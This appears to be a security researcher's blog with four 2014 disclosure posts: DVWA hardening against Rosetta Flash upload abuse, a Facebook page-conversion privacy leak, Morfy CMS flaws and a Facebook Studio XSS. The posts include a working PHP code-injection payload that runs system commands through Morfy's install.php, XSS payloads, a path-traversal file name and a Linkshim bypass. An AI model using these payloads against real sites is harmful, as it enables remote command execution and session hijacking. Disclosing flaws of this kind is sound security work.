Chrismas Gift: A better & safer DVWA (to all!)

9:55 AM

Thanks to me, DVWA have been facing some unintended security abuse, including a very severe & unintended remote command execution. This one was the most severe of all the unintended bugs I discovered in DVWA. Using this, just because you have DVWA installed and your server is running, anybody can execute a command on your box using a CSRF (yeah, I know how weird that might sound for some of you, long story short it was nasty).
Not yet pulled at github, but for now, it can be downloaded at dropbox!

So I contacted RandomStorm & Ryan Dewhurst (Original author of DVWA). And, after further review, we concluded that DVWA high level should no longer be considered safe. Since it is supposed to teach developers the safest way of basic web app security, and it didn’t (it did at one point). But within time, security grows and multiple attack vectors rise such as the Rosetta Flash.

Mainly targeting to fix the RCE by deploying an anti-CSRF token, I started the project with a colleague. Then we got time, so what the hell, fixed a bunch of other bugs (only in the high level, since that’s what’s supposed to be secured), and changed the graphics to a hacker-friendly design. We fixed a bunch of unintended bugs in the high level and in the site itself, mostly file manipulation included.

In case you didn’t check out my first post about most of the issues, I won’t (re?)cover them here. Check them out at here.

In this post I will mention the not-so-popular yet deadly dangerous bug “Rosetta Flash”. On ‘most’ upload forms,

This vulnerability allows an attacker read the client side source code of a website from a different origin (say and then look for potentially sensitive data in those pages for example - CSRF prevention tokens and then successfully mount a side-wide CSRF attack.

Flash’s weird problem(?) - Attacking

   An attacker creates a malicious Flash (SWF) file
    The attacker changes the file extension to JPG
    The attacker uploads the file to
    The attacker embeds the file on using an embed tag with type “application/x-shockwave-flash

    The victim visits, loads the file as embedded with the tag
    The attacker can now send and receive arbitrary requests to using the victims session
    The attacker sends a request to and extracts the CSRF token from the response or read messages or perform any action. (regardless of Content-Type)”

We fixed this simply by deploying a Content-Disposition-header and a confirmation wheater the uploaded file was really an image and not a flash or any other format by using getimagesize() & imagecreatefromjpeg() also, an X-Content-Type: nosniff header to not let Internet explorer confuse the file as an invalid data and sniff its contents as text/html (could be abused to create a persistent XSS).

If your upload script looks like the one in DVWA, check out the new version (more to talk about). The others include giving the uploaded files random names, or it might result XSS and in some cases file inclusion when files names like “../../../config.php%0.0shit.jpg” got uploaded.


Overtime, old security becomes a joke.
& Happy Holidays!


Facebook Migration Privacy Issue

11:20 AM

Been a while since I posted any of my findings. so, just decide to share a recently patched issue in Facebook.

In the news:

So, this issue is kind of an expected behavior, the idea is while converting an account to a page, Facebook never removes data like Friends list and Messages (incase the user want their page get back to a normal account). you know what that means, it practically states we always will remain friends with the people who were friends with us in the conversion process.

Thus, we will be able to see their posts stating "friends" privacy setting by navigating to their page, even though our account is a page and can't be friends with anyone.

Facebook fixed this immediately by removing friend list (or putting it inside a separate backup table), but then the fix created a new issue

when they remove the friend-list, they didn't remove the serialized list of Friends of Friends. I admit, "Friends of Friends" is exactly like "Public" considering the recursion to one another. but still, this called this,

"Say for example I was friends with account  "X"  before my account was a page, say "Y" is friends with X but Y isn't my friend. (which makes "Y" my "Friend of Friends").

Now I change my account to a page, which essentially means X to be my friend (the fix stopped that), But not "Y". So, when Y shares something with the privacy setting "Friends of Friends", I shall be able to see his shares just because "X" was my friend in the conversion process so "Y" is my "Friend of Friends".

Got a generous bounty and great co-operation from Facebook Security.

2014-10-31: Notification
2014-11-01: Response (Facebook Security Team - Bug Bounty Program)
2014-11-13: Vendor Fix/Patch (Facebook Developer Team)
2014-11-15: Second Report
2014-12-13: Vendor Fix/Patch (Facebook Developer Team - Bug Bounty: ****$)  


Morfy CMS Multiple Vulnerabilities

11:19 AM


Executing Commands like a Boss! (*cough cough*)

Versions <= 1.0.5 are vulnerable to the following attacks if certain requirements fulfill

1.       Remote Command Execution

Vulnerable Code
./install.php Line 57

                $post_site_url = isset($_POST['site_url']) ? $_POST['site_url'] : '';

./install.php Line 64-77

                file_put_contents('config.php', "<?php
    return array(
        'site_url' => '{$post_site_url}',
        'site_charset' => 'UTF-8',
        'site_timezone' => '{$post_site_timezone}',
        'site_theme' => 'default',
        'site_title' => '{$post_site_title}',
        'site_description' => '{$post_site_description}',
        'site_keywords' => '{$post_site_keywords}',
        'email' => '{$post_email}',
        'plugins' => array(
        ),    );");

The problem is that it adds multiple unsanitized user input inside a php configuration file (config.php)

Exploitation: goto install.php
Add}','yibelo'=> eval("system('dir');"),// as your website

This will store the following in config.php

return array(
        'site_url' => '{}','yibelo'=> eval("system('dir');"),// ',
        'site_charset' => 'UTF-8',
        'site_timezone' => '{$post_site_timezone}',
        'site_theme' => 'default',
        'site_title' => '{$post_site_title}',
        'site_description' => '{$post_site_description}',
        'site_keywords' => '{$post_site_keywords}',
        'email' => '{$post_email}',
        'plugins' => array(
        ),    );");

Then navigate to then system(‘dir’); (list of files in current directory) will be displayed

2.       Cross Site Scripting

Vulnerable Code
./install.php Line 14
$site_url = 'http://'.$_SERVER["SERVER_NAME"].$port.str_replace(array("index.php", "install.php"), "", $_SERVER['PHP_SELF']);
./install.php Line 20
$rewrite_base = str_replace(array("index.php", "install.php"), "", $_SERVER['PHP_SELF']);
./install.php Line 226
<input type="text" name="site_url" class="form-control" id="site_url" placeholder="Enter Site Url" value="<?php echo $site_url; ?>">

Send a GET request payload like

Will output

<input type="text" name="site_url" class="form-control" id="site_url" placeholder="Enter Site Url" value="”><svg/onload=confirm(1)>

And a reflective XSS shall occur if install.php isn't removed.

Vulnerable? The easiest fix (for both issues) will be to remove install.php the second you finished installing morfy.

Another one for the f*** sakes!

2014-10-12 – Contacted Developers (no reply)
2014-11-00 – Another attempt to contact developers (no reply)
2014-12-17 – Public Disclosure.


XSS Bug on Facebook Studio

8:41 AM


Normally, this bug is a Second-Order-Injection against Facebook mobile that turned out to result XSS on another server (Facebook Studio).

This is caused because of improper user input parsing. First, I noticed doesn’t use Linkshim (malicious link detection system for Facebook). When I saw that, I immediately wrote to Facebook about it. But then I realized, this is not exploitable because it fetches the URL’s from My Facebook profile. Take: is a site blocked by Linkshim.

Meaning, if I add “” as my website on Facebook, it will be fetched to my Studios account. And thus, there needs to be no linkshim because it was first checked on Facebook.

As per my understanding, Linkshim uses a list of sites to identify if the site is malicious or not. So bypassing basically includes cheating the linkshim into thinking our site is not included. As always, I started with case-sensetivity bypasses, hoping, if is blocked, to bypass it with or something like that. But they weren’t vulnerable.

Then I tried URL encoding. There is a value in html called shy. That basically, well, shies elements. This tag can be used in href elements. So <a href=”evil&shy;” >X</a> is equvallent to so all I had to do is add evil&shy; as my website using the mobile interface of Facebook (since the main site sends requests to verify, and the mobile version doesn’t)

So when Facebook studio fetches my URL from my Facebook profile and add it in href tag (hoping it is a safe link checked by Linkshim, and it is), it will become “<a href=”evil&shy;” >X</a>” when clicked redirects to, which is considered a linkshim evasion.

Seeing the source, I then wondered why &shy; still itself and not encoded. So I tried my chance with”><script>alert(0);</script> but that link become

<a href=””” target=’_’ >X</a>
It basically means, the inputs < , >, /  and anything following them is filtered. So I tried event handler XSS’es since quotes aren’t blocked with payloads like 

So that will be rendered as
<a href=””onmouseover=”alert(1); //&shy;.” target=’_’ >X</a>
The bad news is I can’t make it self-executable even using autofocus and onfocus because it is href attribute. So I tried ways of making this self-executable. Then, I  use CSS to make the font very big, so it will fill the screen. So onmouseover will automatically get it triggered because the mouse will be all over it. Note: since it’s a URL for Facebook, no spaces were allowed. 

That was the final payload I added to my Facebook account, as my website. The problem with Facebook was that when adding it to the database, I don’t know why Facebook didn’t html entity it. So when Studio featched the contents, it became

And creating us a Beautiful, self executing XSS.

Nov 22, 2014 7:12am - Notified Facebook
Nov 24, 2014 1:30pm - Facebook Notified its out of scope
Dec 2, 2014 10:42am - Issue got fixed.
Dec 9, 2014 08:03am - Public Disclosure


No matter where the source is, do not trust user input data even while fetching it from a trusted source.